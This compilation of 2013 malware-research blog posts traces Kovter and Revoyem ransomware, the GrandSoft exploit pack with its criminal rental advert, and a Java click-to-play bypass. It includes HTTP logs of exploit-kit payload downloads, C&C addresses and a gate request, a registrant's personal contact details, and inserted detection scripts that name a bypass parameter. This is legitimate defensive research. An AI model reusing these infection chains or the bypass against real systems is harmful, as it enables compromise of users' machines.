Channel: Malware don't need Coffee

Prism themed ransomware - Kovter evolution


Prism logo ;)


I found a new (to me at least; it seems to be about two weeks old) Prism-themed ransomware. Not really worth a post, but it might make you smile too, so here it is:

Prism Themed Ransomware - 2013-08-25
(Kovter.???)
Based on where I found it, its HTTP calls and other details, I would say it could be the same actors that were behind Kovter.

Fiddler trace of the infection + design gathering
<edit1: > Checking a little more, it is an evolution of Kovter. It also looks at your browsing history.
History check
(against a list that is now encoded)
</edit1>


Ransomware C&C :
94.242.206.71
5577 | 94.242.192.0/18 | ROOT | LU | ROOT.LU | ROOT SA

zipwog.biz
Registrant Name: Vladislav Krasnov
Registrant Address1: Kahovskaya st. 31
Registrant City: Perm
Registrant State/Province: Permskaya oblast
Registrant Postal Code: 614109
Registrant Phone Number: +7.9145023291
Registrant Email: krvansed@rambler.ru

<edit2 2013-08-26>
After CIRCL's action, their failover reverse proxy in Germany is being used:
83.133.110.32
13237 | 83.133.0.0/16 | LAMBDANET | DE | GREATNET.DE | GREATNET NEW MEDIA.
zigwog.info
</edit2>
File:
e1988e7512bb18dc0e3ed946ca466d0f - Sample here (OwnCloud via Goo.gl)
407886c0ad30f4152428e7c99536bbaa


Finally ! Here is ... GrandSoft Private SploitPack !!


(not the logo - just for Thumbnail)

That's a lot of exclamation marks, but when you can finally name something after wondering for months what it was, you want to share it!

I had heard of GrandSoft, and of what we called Stamp EK/SofosFO, for more than a year. And yes... we can link both! I have known it for sure since the end of June but could only write about it now because the pack coder took some vacation (no way to land on it; it is rent-only).

StampEK/SofosFO == GrandSoft !

The first time I wrote about it was one year ago, when a dictionary was introduced to build the landing pages.
That episode shows how important, and how difficult, it is to give proper names to threats so that everyone is talking about exactly the same thing.
No name was ever really settled in the community for that pack. I was told it was NeoSploit, then that it was surely not NeoSploit (because NeoSploit was something else... which in fact ended up being Fiesta).

The author of this pack writes, from time to time, feelings/messages in the landing page and jar file of his pack. Here are some:

Image : Courtesy of Sophos
Read:  Sophos sucks? Being insulted by malware authors can be the best reward




GrandSoft jar file a few days after the CVE-2013-0422 0day
Maybe a coincidence, but a class is using my real first name (yes, not that hard to find; thanks, you know who you are, for pointing that out to me)
and a message to the Microsoft team
GrandSoft landing 2013-03-11

GrandSoft Landing 2013-04-15

Advert :
On the underground since March 2012.
Piece of Original Advert

Original text of the Advert
------------------------------------------
<-=[ GrandSoft Private SploitPack]=-> (Limited!), Only rent for $

Еcть cвoбoдныe мecтa! ОГРАНИЧЕННО!!!

Прoбив чуть вышe урoвня пo cвязкaм нa пaблик cплoйтaх.
Дoмeны нaши, ИПы нaши, ceрвaк нaш.
От вac трeбуeтcя тoлькo oплaтa и cлaть трaффик.  
Минуcы:
- Сoфт в cтaдии бeттa. (Бывaют трaблы нeзнaчитeльныe, тeм нe мeнee рaбoтa нaд coфтoм вeдeтcя пocтoяннo!)
Плюcы:
+ Свoи дoмeны (Пocтoянныe cмeны дoмeнoв! вceгдa чиcтo пo АВ!)
+ Свoи ceтки IP's (Тaк жe пocтoяннaя cмeня IP'oв! Чуть чтo, тaк cрaзу мeняeм IP. В тoм чиcлe нeпaлит и cпaмхaуc!)
+ Пocтoянный крипт (Кoнeчнo кaк у вceх бывaeт чтo пaлитcя. Нo мы рaбoтaeм и чиcтим, ecли и пaлитcя, тo oбычнo 2-3 АВ нe бoльшe, a чиcтитcя oт 1 чaca дo 3-4)
+ Крипты прoвeряютcя нa виртуaлкaх (Чeкaли, вce плaтныe ceрвиcы АВ cкaнeрoв прoбoвaли, ни oдин нe пoкaзывaл aдeквaтнoгo рeзультaтa пo чиcтoтe  , пo ceрвиcу якoбы cплoйты чиcтыe, a нa дeлe пaлятcя тeм или иным aвeрoм, пoтoму прoвeряeм пoпулярныe АВ нa виртуaлкaх!)
+ Огрaничeннo чиcлo мecт (В нaшeй cфeрe чeм бoльшe кoл-вo иcпoльзующих прoдукт клиeнтoв, тeм мeньшe кaчecтвo, кoнкрeнтo пaлятьcя быcтрee ипы, дoмeны, cплoйты , пoтoму чиcлo клиeнтoв oгрaничeннo!)
+ Вoзмoжнocть грузить dll.
+ Удoбнaя рaбoтa: aвтoaпдeйт eхe, aвтoмaтичecкий eхe aв чeкeр, aв cвязкa чeкeр, aвтo выдaчa линкoв, джaбeр бoт нoтифкaтoр и т.д.

Прoшу oбрaтить внимaниe, у нac нecкoлькo инoй тaрифный рacчeт, тaриф рaccчитывaeтcя из cкoрocти пoтoкa трaффикa в чac.
Тeкущиe тaрифы: (пoтoк трaфa в чac = нeдeля / мecяц).
<10k/hour = 900$ / 3500$
<15k/hour = 1350$ / 5200$
<20k/hour = 1800$ / 7000$
* Лимит нa кoл-вo хocтoв (Лимит в чac!). Пo вoзмoжнocти фильтруйтe нe уникoв, нe виднoвc, хрoм , бoтoв и прoчий шлaк дo oтcылa нa cвязку!

Кoнтaкты:
GrandSoft@default.rs
GrandSoft@xmpp.jp
GrandSoft@thiessen.it
* Оcнoвнoй кoнтaкт пeрвый, ocтaльныe рeзeрвныe.
* ОТR ecть.


PS: С иcтeричecкими, нeрвными, нeaдeквaтными личнocтями нe рaбoтaю. Увaжaйтe ceбя.
Тaк жe мoгу oткaзaть в рaбoтe бeз oбъяcнeния причин.
PSS: Нe уcтрaивaeт цeнa? Сoрри, вaм cтoит oбрaтитьcя к кoнкурeнтaм. Дaнный вoпрoc нe oбcуждaeтcя, флуд пo нeму тaк жe нe имeeт cмыcлa.
PS кoнкурeнтaм: Пoвышeнный прoбив дocтигaeтcя зa cчeт тoгo, чтo юзaютcя тoлькo чиcтыe дoмeны и ипы, и cплoйты пeрeкриптoвaютcя пo нecкoльку рaз зa дeнь, пoтoму coвeтую вaм нe трaтить cвoe врeмя нa рaзбoр мoeй выдaчи, ничeгo нoвoгo вы тaм нe нaйдeтe, cплoйты тaкиe жe кaк и у вac: 2 джaвa, пдф пaк (eмaл,кoллaб,ньюплeeр,либтиф). Ничeгo cвeрхecтecтвeннoгo , в cвязкe нeт и нe будeт никaких зeрoдeй cплoйтoв.  

I work only with Russian people!
------------------------------------------
Translated by Malwageddon (Thanks !) as :
------------------------------------------
<-=[ GrandSoft Private SploitPack]=-> (Limited!), Only rent for $

We got some places available! LIMITED!!!


Callback rate is slightly better than the one using EKs with publicly available exploits.
We provide domain names, IPs and the server.
You only need to pay and send traffic.

Disadvantages:
- Software is in BETA. (We do experience some difficulties sometimes, but the software is under constant development!)

Advantages:
+ Our domain names (Constantly changing domains! Always AV clean!)
+ Our IP ranges (Also, constantly changing IP addresses. If we find anything suspicious we instantly change the IP. We also stay Spamhaus free.)
+ Constantly encrypting (Of course it happens and the software starts being detected. We work on it and clean it up. Even when it's detected it's 2-3 AVs not more and we clean it up in 1 hour - 3-4 hours most)
+ We use VMs to test new crypts (Checked using all commercial AV scanners - none of them shows an appropriate result though. According to some services the exploits are clean, but in reality are being detected, so we test the most popular AVs using VMs )
+ Limited number of places (In our business, the more people using a product the lesser quality you get - IPs, domain names get blacklisted, exploits detected and so on. That's why we limit the number of clients!)
+ DLL loading is supported.
+ Easy to use: EXE auto-update, EXE AV auto-checker, EK AV checker, auto links issue, bot notification supports Jabber, etc.

Please note, we have slightly different tariff pricing - it depends on the incoming traffic per hour.
Current pricing: (incoming traffic per hour = week / month).
<10k/hour = 900$ / 3500$
<15k/hour = 1350$ / 5200$
<20k/hour = 1800$ / 7000$
* Amount of hosts limited (per hour!). If possible filter non-unique, non-Windows, Chrome, bots and other rubbish prior to directing traffic to the EK!

Contacts:
GrandSoft@default.rs
GrandSoft@xmpp.jp
GrandSoft@thiessen.it
* First is the main contact - the rest are reserves.
* OTR is present.

PS: I do not work with hysterical, nervous and senseless people! Respect yourselves.
I can also terminate your service with no reason given.
PSS: Don't like the price? Sorry, ask competitors. I do not negotiate over the prices, so spare your time and mine.
PS for competitors: Better callback is achieved through only using clean IPs and domain names, also exploits are re-encrypted a few times a day, so spare your time analysing my setup - you won't find anything new. I use the same exploits as you do: 2 Java, PDF pack (email, collab, newplayer, libtiff). There are no 0-days or anything extraordinary, and there never will be.

I work only with Russian people!
------------------------------------------

I don't know exactly what the admin panel looks like, but here are some traffer/seller pages:

GrandSoft Traffer/Seller Page - End of 2012

GrandSoft - Beginning of January (before CVE-2013-0422)


Grandsoft Traffer/Seller Page - May 2013

I'll make the first pass with (obviously) the latest publicly available Java 6 exploit (hot topic...):
CVE-2013-2463 :
CVE-2013-2463 successful pass on Win7 x64 - jre16u45


GET http://accommodation.romancenu .org/swallowing_cofounder.html
200 OK (text/html) - Pastebin

Creation of the next call's URL pattern based on the Adobe Reader plugin version
(to fire the bullet that fits the hole in the victim's Adobe Reader version)




GET http://accommodation.romancenu .org/cs9swQXJGQmKXGKQ/11.0./wonder.php5
200 OK (text/html)
PDF not (yet...?) exploitable... only the Java bullet is fired!


GET http://accommodation.romancenu .org/b0r1poiiwpr4egraoEawpE4rgwqpD/news.jar
200 OK (application/java-archive) 
 4c477d6d1bfd02b7ff2e6ab7afdf96db
Obfuscated import
Piece of CVE-2013-2463 in GrandSoft jar 2013-09-08


Hex-encoded class acting as downloader
Thanks to Chris Wakelin for the help!


GET http://accommodation.romancenu .org/b0r1poiiwpr4egraoEawpE4rgwqpD/news.jar
200 OK (application/java-archive) 


GET http://accommodation.romancenu .org/b0r1poiiwpr4egraoEawpE4rgwqpD/2886/4911345
200 OK (application/java-archive) once decoded: 3d1e04ebbb372ca37f87d89b4884871c (out-of-scope payload; if anyone looks at it, feedback welcome! :) - C&C: liliputttt8888.com - 70.122.201.25 - POST /ipv.php & /html2/)

CVE-2010-0188 :


CVE-2010-0188 successful path in GrandSoft EK

GET http://xsbqlrm.sole.kosher-qscessationztad.biz/bally_affluent_victim
200 OK (text/html)


GET http://xsbqlrm.sole.kosher-qscessationztad .biz/yfxswQXJGQmKXGKQ/9.3.0/wonder.php5
200 OK (text/html)

GET http://xsbqlrm.sole.kosher-qscessationztad .biz/b3e82oiiwQrgograoEawpE4roDewp/357925970/comfortable.pdf
200 OK (application/pdf)  
79a73625ffd620772d28ddf540b189ff (I may edit later to study that one in more detail)

GET http://xsbqlrm.sole.kosher-qscessationztad .biz/5toiiwQrgograoEawpE4roDewp/337606552/6933484
200 OK (application/pdf) once decoded 76a3b1f6c3635ae9dba3745701a0faf7 (quite surely a repack of the previous one; same behaviour)



CVE-2013-0422 :


Double shot by CVE-2013-0422 & CVE-2010-0188 in GrandSoft
Those patterns are for a double shot... otherwise the 2nd URL may contain null (no Adobe Reader) or another version of Adobe Reader

GET http://bumped.straining.unfortunately-vrvarcanaicp .biz/labels.php
200 OK (text/html)

GET http://bumped.straining.unfortunately-vrvarcanaicp .biz/dmwQXJGQmKXGKQ/9.3.0/wonder.php5
200 OK (text/html)

GET http://bumped.straining.unfortunately-vrvarcanaicp .biz/43znoiiwwip4graoEawpE4roEwQG/357925970/comfortable.pdf
200 OK (application/pdf)

GET http://bumped.straining.unfortunately-vrvarcanaicp .biz/4mwoiiwwip4graoEawpE4roEwQG/news.jar
200 OK (application/java-archive) 790ab433e52423e91779876833660033


Encoded import class name in the CVE-2013-0422 jar in GrandSoft
Decoding the variable using Malzilla
(after a tiny Java-to-JavaScript conversion)
Note the : antimalware(pizdainxuyHero  



GET http://bumped.straining.unfortunately-vrvarcanaicp.biz/4mwoiiwwip4graoEawpE4roEwQG/news.jar
200 OK (application/java-archive)

GET http://bumped.straining.unfortunately-vrvarcanaicp.biz/4mwoiiwwip4graoEawpE4roEwQG/0886/4268355
200 OK (application/java-archive)  once decoded :  3d1e04ebbb372ca37f87d89b4884871c

GET http://bumped.straining.unfortunately-vrvarcanaicp.biz/f8wwoiiwwip4graoEawpE4roEwQG/395526046/6096281
200 OK (application/pdf)


CVE-2011-3544 :
Why? Because the newer CVEs seem to crash on JRE 6 update 18 and earlier. (Thanks a lot, you know who you are)


CVE-2011-3544 successful pass in GrandSoft
GET http://experiencing.electingipzxrosstbie .in/invalid
200 OK (text/html)

GET http://experiencing.electingipzxrosstbie .in/5mb6ewQXJGQmKXGKQ/null/wonder.php5
200 OK (text/html)

GET http://experiencing.electingipzxrosstbie .in/0037484uoiiwGawEgraoEawpE4rpiQim/news.jar
200 OK (application/java-archive)  4e17af9e6d7438544aa06918df811dd5


Piece of CVE-2011-3544 in GrandSoft jar
GET http://experiencing.electingipzxrosstbie .in/0037484uoiiwGawEgraoEawpE4rpiQim/news.jar
200 OK (application/java-archive)

GET http://experiencing.electingipzxrosstbie .in/0037484uoiiwGawEgraoEawpE4rpiQim/com.class
404 Not Found (text/html)
GET http://experiencing.electingipzxrosstbie .in/0037484uoiiwGawEgraoEawpE4rpiQim/edu.class
404 Not Found (text/html)
GET http://experiencing.electingipzxrosstbie .in/0037484uoiiwGawEgraoEawpE4rpiQim/net.class
404 Not Found (text/html)
GET http://experiencing.electingipzxrosstbie .in/0037484uoiiwGawEgraoEawpE4rpiQim/org.class
404 Not Found (text/html)

GET http://experiencing.electingipzxrosstbie .in/0037484uoiiwGawEgraoEawpE4rpiQim/1886/7678063
200 OK (application/java-archive) decoded  76a3b1f6c3635ae9dba3745701a0faf7

Exploitation graph :
Disclaimer: I didn't spend a lot of time on the PDF side, so don't put too much credit in the work here.
The Java part needs some refinement (versions).

Fast (incomplete) exploitation graph for GrandSoft 2013-09-09

Files : here (OwnCloud via goo.gl) (5 Fiddler captures (don't trust the referrer, I often fake it), 1 payload, 3 jars, 2 PDFs)
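To make the chain above actionable in proxy logs, here is a small reconstruction script added for this page (my code, not the author's and nothing from the GrandSoft pack). It classifies each request into the stages seen in these traces: the landing page, the wonder.php5 plugin check that carries the Reader version (or null when there is no Reader), the news.jar / PDF exploit fetch, and the extension-less encoded payload fetch. The URL shapes, the one-line log format and the sample log are assumptions built from the requests quoted in this post; the payload itself is still encoded when fetched, so the script only records the fetch.

```python
import re
from collections import OrderedDict
from urllib.parse import urlsplit

# URL shapes inferred from the GrandSoft traces in this post (the constant
# "wQXJGQmKXGKQ" token before the Reader version, news.jar, the /<digits>/<name>.pdf
# exploit and the extension-less /<digits>/<digits> payload). They are an assumption
# for illustration, not a published signature; a rented pack can change them any day.
PLUGIN_CHECK = re.compile(r"^/[A-Za-z0-9]*wQXJGQmKXGKQ/(?P<reader>[\d.]+|null)/wonder\.php5$")
JAR_EXPLOIT = re.compile(r"^/[A-Za-z0-9]+/news\.jar$")
PDF_EXPLOIT = re.compile(r"^/[A-Za-z0-9]+/\d+/[a-z]+\.pdf$")
PAYLOAD = re.compile(r"^/[A-Za-z0-9]+/\d+/\d+$")
CLASS_PROBE = re.compile(r"^/[A-Za-z0-9]+/[a-z]+\.class$")

# Constructed one-request-per-line format: "<method> <url> <status> <content-type>".
LOG_LINE = re.compile(r"^(GET|POST)\s+(\S+)\s+(\d{3})\s+(\S+)$")


def classify(path):
    """Map a request path to a chain stage; detail is the Reader version for the plugin check."""
    m = PLUGIN_CHECK.match(path)
    if m:
        return "plugin_check", m.group("reader")
    if JAR_EXPLOIT.match(path):
        return "exploit_jar", None
    if PDF_EXPLOIT.match(path):
        return "exploit_pdf", None
    if PAYLOAD.match(path):
        return "payload", None
    if CLASS_PROBE.match(path):
        return "class_probe", None
    return "other", None


def reconstruct(lines):
    """Group requests per host and record which stages of the chain were seen."""
    chains = OrderedDict()
    for line in lines:
        m = LOG_LINE.match(line.strip())
        if not m:
            continue
        method, url, status, ctype = m.groups()
        parts = urlsplit(url)
        c = chains.setdefault(parts.hostname, {
            "landing": None, "reader": None, "exploits": [], "payloads": [], "class_probes": 0,
        })
        stage, detail = classify(parts.path)
        ok = status == "200"
        if stage == "plugin_check" and ok:
            c["reader"] = detail
        elif stage in ("exploit_jar", "exploit_pdf") and ok:
            c["exploits"].append(stage.split("_")[1])
        elif stage == "payload" and ok:
            c["payloads"].append(parts.path)
        elif stage == "class_probe":
            # The .class 404s seen in the CVE-2011-3544 trace: counted, not interpreted.
            c["class_probes"] += 1
        elif stage == "other" and ok and ctype == "text/html" and c["landing"] is None:
            c["landing"] = parts.path
    return chains


def verdict(chain):
    """Summarise one host: stages seen in chain order, and whether a full chain completed."""
    stages = []
    if chain["landing"]:
        stages.append("landing")
    if chain["reader"] is not None:
        stages.append("plugin_check")
    if chain["exploits"]:
        stages.append("exploit")
    if chain["payloads"]:
        stages.append("payload")
    return {
        "stages": stages,
        "complete": stages == ["landing", "plugin_check", "exploit", "payload"],
        "reader": chain["reader"],  # "null" = no Reader plugin reported, so only the Java bullet fires
        "exploits": sorted(set(chain["exploits"])),
        "payload_fetches": len(chain["payloads"]),
        "class_probes": chain["class_probes"],
    }


def analyse(log_text):
    return {host: verdict(c) for host, c in reconstruct(log_text.splitlines()).items()}


# Constructed sample built from the request lines quoted in this post (defanging
# removed) plus one benign host; not a real capture.
SAMPLE_LOG = """\
GET http://accommodation.romancenu.org/swallowing_cofounder.html 200 text/html
GET http://accommodation.romancenu.org/cs9swQXJGQmKXGKQ/11.0./wonder.php5 200 text/html
GET http://accommodation.romancenu.org/b0r1poiiwpr4egraoEawpE4rgwqpD/news.jar 200 application/java-archive
GET http://accommodation.romancenu.org/b0r1poiiwpr4egraoEawpE4rgwqpD/2886/4911345 200 application/java-archive
GET http://experiencing.electingipzxrosstbie.in/invalid 200 text/html
GET http://experiencing.electingipzxrosstbie.in/5mb6ewQXJGQmKXGKQ/null/wonder.php5 200 text/html
GET http://experiencing.electingipzxrosstbie.in/0037484uoiiwGawEgraoEawpE4rpiQim/news.jar 200 application/java-archive
GET http://experiencing.electingipzxrosstbie.in/0037484uoiiwGawEgraoEawpE4rpiQim/com.class 404 text/html
GET http://experiencing.electingipzxrosstbie.in/0037484uoiiwGawEgraoEawpE4rpiQim/1886/7678063 200 application/java-archive
GET http://www.example.com/index.html 200 text/html
"""

if __name__ == "__main__":
    for host, v in analyse(SAMPLE_LOG).items():
        print(host, v)
```

The Reader version captured from the plugin-check URL is the useful pivot: a host reporting 9.3.0 is the one that will receive the PDF bullet, while null means a Java-only run, which is exactly the branching the "double shot" captions describe.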


Revoyem goes international - shocking distribution....



The dirty Revoyem (aka DirtyDecrypt) ransomware seems to have appeared at the end of March 2013 and was targeting only Germany and Great Britain. It looks like they are now going international and are really aggressive in the way they distribute it.

I already mentioned the "double kick the victim" way of distributing some ransomware. I saw it in action again today. From a porn website you are redirected, by a TrafficHolder malvert, to a child-porn-themed page (impact 1: the images are highly disturbing), from which you get infected via Styx, which drops a ransomware that locks your computer, displays disturbing images and tells you that you just viewed illegal content (impact 2, amplified because it's true: you just viewed illegal content, even if you were driven there against your will).

1: Bring the victim to illegal content.
2: Infect and lock the victim for seeing illegal content.
Sample: 4382872727fc8c0996fa315c599ecdf0 (in the zip at the end or in the malwr.com analysis)

C&C : 95.211.109.206 korrambatu .biz
16265 | 95.211.0.0/16 | LEASEWEB | NL | LEASEWEB.COM | LEASEWEB B.V.

Malwr.com analysis (which I can now link here; thanks Claudio for redacting the design that was successfully captured)

Nothing really new here, but I think it's better to know which countries are targeted.
I made a gathering session and here is the list I saw:

AT, BE, CA, CZ, DE, DK, ES, FR, GB, IT, NL, PL, SE, TR, US

Note: there are quite surely more.
I will only display the US version and the banner for each country, but the blurred full designs are available in the zip in case one wants to use them for awareness-raising purposes.

Revoyem US 2013-09-12

AT :

Revoyem AT Banner 2013-09-12


BE :

 Revoyem BE Banner 2013-09-12
CA :

Revoyem CA Banner 2013-09-12

CZ :

Revoyem CZ  Banner 2013-09-12
DE :

Revoyem DE Banner 2013-09-12


DK : 

Revoyem DK Banner 2013-09-12
ES : 

Revoyem ES Banner 2013-09-12
FR : 

Revoyem FR Banner 2013-09-12
GB :

Revoyem GB Banner 2013-09-12
IT :

Revoyem IT Banner 2013-09-12

NL :
Revoyem NL Banner 2013-09-12
PL :

Revoyem PL Banner 2013-09-12
SE :

Revoyem SE Banner 2013-09-12


TR :

Revoyem TR Banner 2013-09-12
<edit1:>
More campaigns described by Malekal here: http://www.malekal.com/2013/08/08/dirdecrypt-malvertising-trafficholder/
Some other domains likely involved in the C&C part, via Dhia Mahjoub </edit1>


Files : in the zip: full blurred designs, sample, Fiddler capture. Here (OwnCloud via goo.gl)





jre7u21 and earlier Click-2-Play Warning Bypass integrating Exploit Kits




A new variant of a "Kore-ish" Cool EK appeared a few days ago.
Yes... it's difficult to follow the fast-moving EK landscape. No payload in the jar for that one.
Some instances of this "Cool EK" in URLQuery
I faced it often where I used to see the Kore (aka Sibhost) Exploit Kit.
It is also used to spread the Urausy ransomware and FakeAV (so... BestAV stuff).

All jars found there were identical to those in Blackhole. Till today.

CVE-2013-2460 + Click2Play Bypass :

That CVE was already in use in Private Exploit Pack, but it was noisy (Imposition then made it optional).

CVE-2013-2460 successful path in Cool EK (Kore-ish)
Click2Play Bypass inside 2013-09-20


GET http://[redacted].tacogratis .com/index.php?p=5267
200 OK (text/html)

Key Piece of the landing


GET http://[redacted].tacogratis .com/index.php?p=5290
200 OK (text/javascript)

GET http://[redacted].tacogratis .com/index.php?p=5268 fb1decbef1c4361eb421a3496201ef30
200 OK (application/java-archive)

GET http://[redacted].tacogratis .com/index.php?p=5268
200 OK (application/java-archive)

GET http://cghtuj.tacogratis .com/index.php?p=5275&e=14
200 OK (application/x-msdownload)  170896de44d75651bbbd9358b0f11c34 (Urausy Ransomware)

----- Off Topic ----
The payload is rotating fast (2 more MD5s):
b56348220f83ad9db50cb5beb564148b
64ef8f2cb215af4b2fbcb51cadfcc025

Urausy Ransomware - DE design - 2013-09-20
(BestAV soft 2)


Note : on another thread you can get  a FakeAV

Payload call with bigger charge


9d8d3094849f685859945140721aafb1
7fb9423c4bdf7080137745e81ba38362
13e24b552ea472146495ac8a33cca975

Other payload from this "Kore-ish" Cool EK
(BestAV Soft1)
-------------------

So what's that Click2Play bypass?

Quite surely: http://seclists.org/bugtraq/2013/Jul/41
2013-06-18 - Vulnerability fixed in Java 7u25

Yes :

Warning with jre7u25
(and as CVE-2013-2460 is patched too, clicking on Run there won't put you at risk)


It's the first time I see that.
5 days ago:

Who sold it?
??

No download link for now. Yes, it will spread fast anyway.
It's easy to get rid of all these exploit kits: update!

<edit1 2013-09-21>
Already in Sakura... surely because of that blog post. It's often difficult to decide how much you can write about something.

Sakura CVE-2013-2460 & Click2Play Bypass :


Sakura featuring CVE-2013-2460 & Click2Play bypass
2013-09-21


GET http://[redacted]253 .pw:8509/me.php
200 OK (text/html)


Precision strike
New Click2Play bypass for the 7u21 version
JNLP call

GET http://[redacted] .pw:8509/[redacted].ee
200 OK (application/java-archive) dca89d839abbb8f621a87de94d20d8f2 CVE-2013-2460

Piece of CVE-2013-2460 in Sakura Jar
2013-09-21


 GET http://[redacted] .pw:8509/bodystarswild.ee
200 OK (application/java-archive)

GET http://[redacted] .pw:8509/2889.ld
200 OK (application/octet-stream) Once decoded: 5fba8226303967ccfd27ea8710a8b99d. I think it's a Smoke Bot.

----- Off Topic ----
C&C Calls :
mexstat757.com POST /satep757/index.php
mexstat220.pw GET /setex/sev57.exe 
mexstat220.pw  GET  /setex/pm555.exe
etc...

46.165.201.27 
16265 | 46.165.192.0/18 | LEASEWEB | DE | LEASEWEB.COM | LEASEWEB GERMANY GMBH

It's the same guys as those who were behind this one-year-old post:
Since then, Smoke Bot has started encrypting its network calls.

---------------------- 
</edit1>
<edit2: 2013-09-23>
Nuclear Pack : CVE-2013-2460 + Click2Play bypass

Announced underground:
"добавлен новы exploit, пробив увеличен. работает тихо и не палится"  Nuclear
which means something like:
"New exploit added, penetration rate increased. Works silently and is not detected"

CVE-2013-2460 with no security prompt successful path in Nuclear Pack
2013-09-23


GET http://[redacted].flogdoyfohoqobl .biz:12421/3dfa4ffa555573ba6fbb54a243289806/4/5b1bb46b5a96bee3ebbb1d2251d968bb.html
200 OK (text/html)


Precision Strike  (Thanks @EKWatcher )
jnlp call in Nuclear Pack
After Deobfuscation (Thanks @EKWatcher )


GET http://[redacted].flogdoyfohoqobl .biz:12421/b26c7ee3934bb471d1e1a7e4072dc6ef/1379924555/ba365f21b8ebcfe78ba8a843b76c2d06.jar
200 OK (application/java)


GET http://[redacted].flogdoyfohoqobl .biz:12421/b26c7ee3934bb471d1e1a7e4072dc6ef/1379924555/ba365f21b8ebcfe78ba8a843b76c2d06.jar
200 OK (application/java)
 e03455403f226b23be42b30733a26101


Piece of CVE-2013-2460 in Nuclear Pack
2013-09-23
GET http://[redacted].flogdoyfohoqobl .biz:12421/f/1379924555/ba365f21b8ebcfe78ba8a843b76c2d06/b26c7ee3934bb471d1e1a7e4072dc6ef/2
200 OK (application/octet-stream) Decoded : 3a9d1dcad1176717711eb92b25f7d6b0

GET http://[redacted].flogdoyfohoqobl .biz:12421/f/1379924555/ba365f21b8ebcfe78ba8a843b76c2d06/b26c7ee3934bb471d1e1a7e4072dc6ef/2/2
200 OK (application/octet-stream)

----------- Out of Topic -----------
C&C :
185.6.80.125 - 61422 | 185.6.80.0/24 | TD-VITA | RU | - | TD-VITA LLC.
for instance :
POST /mBj7cjhH/gate.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Connection: close
User-Agent: Mozilla/4.0
Host: halifaxkilo.com

Analysis by Joe Sandbox Cloud
------------------------------------
</edit2>
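The "JNLP call" captions in the Sakura and Nuclear traces above refer to the applet being launched through a JNLP descriptor carried by the landing page rather than by a bare applet tag. As an added triage helper for that (my code, written for this page; not the author's tooling and nothing taken from the kits), here is a parser that pulls applet/object tags out of a landing page, decodes the standard jnlp_embedded parameter (base64 of the JNLP XML), lists the jar hrefs and the applet-desc parameters, and flags the parameter I associate with the 7u21 bypass advisory linked in the post. The HTML and JNLP inputs are constructed samples, and the flagged parameter name is recalled from memory rather than copied from the advisory, so verify it there before using it as a signature.

```python
import base64
import re
import xml.etree.ElementTree as ET

# Parameter name I associate with the 7u21 click-to-play bypass from the Bugtraq
# advisory linked in this post; recalled, not copied, so verify it against the advisory.
SUSPICIOUS_PARAMS = {"__applet_ssv_validated"}

TAG_RE = re.compile(r"<(applet|object)\b.*?</\1\s*>", re.I | re.S)
PARAM_RE = re.compile(
    r"""<param\s+name\s*=\s*["']?([^"'\s>]+)["']?\s+value\s*=\s*["']?([^"'>]*)["']?""", re.I)
ARCHIVE_RE = re.compile(r"""\barchive\s*=\s*["']?([^"'\s>]+)""", re.I)


def extract_applets(html):
    """Return one record per applet/object tag: jar URLs, JNLP href, embedded-JNLP params, flags."""
    records = []
    for m in TAG_RE.finditer(html):
        tag = m.group(0)
        params = {k.lower(): v for k, v in PARAM_RE.findall(tag)}
        rec = {"jars": [], "jnlp_href": params.get("jnlp_href"), "jnlp_params": {}, "flags": []}
        a = ARCHIVE_RE.search(tag)
        if a:
            rec["jars"].extend(x.strip() for x in a.group(1).split(",") if x.strip())
        embedded = params.get("jnlp_embedded")
        if embedded:
            try:
                # jnlp_embedded carries the JNLP XML as base64; pages often drop the padding.
                xml = base64.b64decode(embedded + "=" * (-len(embedded) % 4))
                root = ET.fromstring(xml)
            except (ValueError, ET.ParseError):
                rec["flags"].append("undecodable jnlp_embedded")
            else:
                rec["jars"].extend(j.get("href") for j in root.iter("jar") if j.get("href"))
                rec["jnlp_params"] = {p.get("name", ""): p.get("value", "") for p in root.iter("param")}
        for name in set(params) | set(rec["jnlp_params"]):
            if name in SUSPICIOUS_PARAMS:
                rec["flags"].append("c2p-bypass param: " + name)
        records.append(rec)
    return records


# Constructed sample (not captured from any of the kits above): a 1x1 applet whose
# JNLP travels inline via jnlp_embedded, the shape the "JNLP call" captions refer to.
SAMPLE_JNLP = b"""<?xml version="1.0" encoding="UTF-8"?>
<jnlp spec="1.0+">
  <information><title>t</title><vendor>v</vendor></information>
  <resources><j2se version="1.7+"/><jar href="applet.jar" main="true"/></resources>
  <applet-desc name="t" main-class="Run" width="1" height="1">
    <param name="__applet_ssv_validated" value="true"/>
  </applet-desc>
</jnlp>"""

SAMPLE_HTML = (
    '<html><body><applet code="Run.class" width="1" height="1">'
    '<param name="jnlp_href" value="launch.jnlp">'
    '<param name="jnlp_embedded" value="%s">'
    '</applet></body></html>' % base64.b64encode(SAMPLE_JNLP).decode()
)

if __name__ == "__main__":
    for rec in extract_applets(SAMPLE_HTML):
        print(rec)
```

Run it over the deobfuscated landing (the kits hide the applet tag behind JavaScript, as the "After Deobfuscation" caption shows), not over the raw HTML; the parser only sees what the page actually emits.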

Cookie-Bomb : The "Северная Сказка" Iframer way

For Thumbnail
(from turn.com)
The first mention of what they named the "CookieBomb" code injection attack comes from @MalwareMustDie in this post.


I won't explain here how I know which product is behind this, but know that, for instance, the Reveton team used it (or at least one traffer for Reveton did), as mentioned by @Malekal_morte

The product behind the CookieBomb: Iframer "Северная Сказка" ("Tale of the North")

Snapshot of the advert
Original text of the advert:
--------------------------------------------
Ифреймер "Северная Сказка"

Добрый день,

Меня зовут Пётр Севера, и я с гордостью представляю всем желающим свой новый продукт - ифреймер "Северная Сказка". Разработка его до текущего состояния заняла несколько лет, и можно с уверенностью утверждать, что легендарная кнопка "Бабло" теперь доступна всем желающим. Ифреймер уже используют десятки людей из моего ближайшего окружения, и от всех без исключения он заслужил самые высокие оценки. Обычно, софт такого уровня вообще не доступен для широкой публики, и тихо годами приносит сверхприбыли избранным. Многие из тех, кто использует "Северную Сказку" сейчас, под разными предлогами отговаривали меня от начала продаж широкому кругу лиц. Но, посоветовавшись с партнерами по этому проекту, хорошенько взвесив все плюсы и минусы, я осознанно пошел на этот шаг.

Что же такое ифреймер "Северная Сказка"? Как любит говорить главный разработчик — это не просто ифреймер, это целая операционная система. Итак, "Северная Сказка" — это многофункциональный серверный софт, управление которым происходит через удобную веб-панель.

Основной функционал:
